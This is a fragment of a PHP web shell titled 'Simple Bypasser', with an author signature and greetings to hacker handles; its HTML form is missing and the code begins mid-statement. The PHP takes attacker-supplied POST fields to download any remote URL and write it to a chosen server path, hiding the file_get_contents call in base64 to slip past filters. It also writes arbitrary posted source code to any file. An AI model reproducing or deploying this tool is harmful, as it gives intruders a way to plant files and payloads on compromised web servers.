Simple Bypasser

[+] Simple Bypasser !

Create Folder :



Get File :



Fopen File :


[+] Done [ $mk ] Created !"; } } # File Get Contents if($_POST['fileget']) { $get = $_POST['get']; $n4m = $_POST['name']; $path = $_POST['select']; $func2 = "ZmlsZV9nZXRfY29udGVudHM="; $de2 = base64_decode($func2); $rules2 = $de2($get); $open = fopen("$path/$n4m", 'w'); fwrite($open,$rules2); fclose($open); if($get) { echo "done"; } } # # fopen File if($_POST['fopen']) { $save = $_POST['save']; $path2 = $_POST['path2']; $open2 = fopen("$path2/$save", 'w'); $source1 = $_POST['source']; $source2 = stripslashes($source1); fwrite($open2 ,$source2); fclose($open2); if($open2) { echo "done"; } } ?>


# Coded By : Dr.KroOoZ #
# E-mail : b0x@hotmail.com #
# Homepage : www.sec4ever.com  #
# GreetsTo : b0x - N.K - Asmar - No-QRQR - n4ss1m -
DR.THMOORY #

Note : This Tool Is Using file_get_contents & fOpen Functions !